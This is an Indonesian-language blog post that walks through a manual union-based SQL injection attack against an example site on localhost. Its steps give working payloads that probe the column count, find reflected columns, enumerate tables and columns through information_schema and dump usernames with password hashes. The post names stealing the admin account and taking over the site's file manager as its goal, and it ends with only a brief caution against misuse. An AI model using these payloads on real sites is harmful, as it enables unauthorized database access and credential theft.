Hacking Web dengan SQL Injection

Hacking Web dengan SQL Injection

Terbit pada 2016-10-13, 20:07:10 WIB. Oleh : Fuad Nur Hasan, Dibaca : 293 kali

Hacking Web dengan SQL Injection - SQL injection merupakan sebuah teknik serangan yang dilakukan dengan cara memasukan parameter-parameter SQL pada halaman update kontent tertentu yang memiliki celah atau kerentangan, bisa halaman berita, halaman kategori, halaman komentar, buku tamu dan halaman galeri foto. Ciri-ciri dari halaman update content tersebut biasanya ditampilkan berdasarkan ID/ Primary Key. Serangan hacking ini berfokus pada pencurian account admin lalu memasang dork untuk menguasai file manajer. Berikut saya berikan step-by- step manual SQL injection pada sebuah situs:

1. Cari halaman site target yang mengandung info URL id/Primary key.

Contoh dalam kasus ini :”http://localhost:8080/site/index.php?page=1

2. Cek vulnerabel (rentang) pada site target: “ http://localhost:8080/site/index.php?page=-1 order by  1,2,3,4,5,6,7,8,9-“

sehingga akan muncul :

Database query failed: Unknown column ’7′ in ‘order clause‘

3. Pesan No 2 menunjukkan bahwa ada 6 column. Kemudian kita akan cari coloumn error sebagai pintu untuk mengintip seluruh isi database degan cara:

http://localhost:8080/site/index.php?page=-1 union select all 1,2,3,4,5,6–

4. Setelah muncul no ajaib masukkan parameter version() dan database() pada no ajaib tersebut

5. Setelah database dan version kita ketahui, kita akan gunakan information shcemahttp://localhost:8080/site/index.php?page=-1 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()—

6. http://localhost:8080/site/index.php?page=-1 union all select 1,2,group_concat(column_name),4,5,6              from information_schema.columns where table_name=“users”—

7. http://localhost:8080/site/index.php?page=-1 union all select 1,2,concat_ws(0x3a,username,hashed_password),4,5,6 from    users–

Dengan perintah di atas kita telah bisa mendapatkan user dan password dari website target kita. Gunakan ini sebagai ilmu bukan untuk merusak.



Bagikan Artikel :


Baca Juga :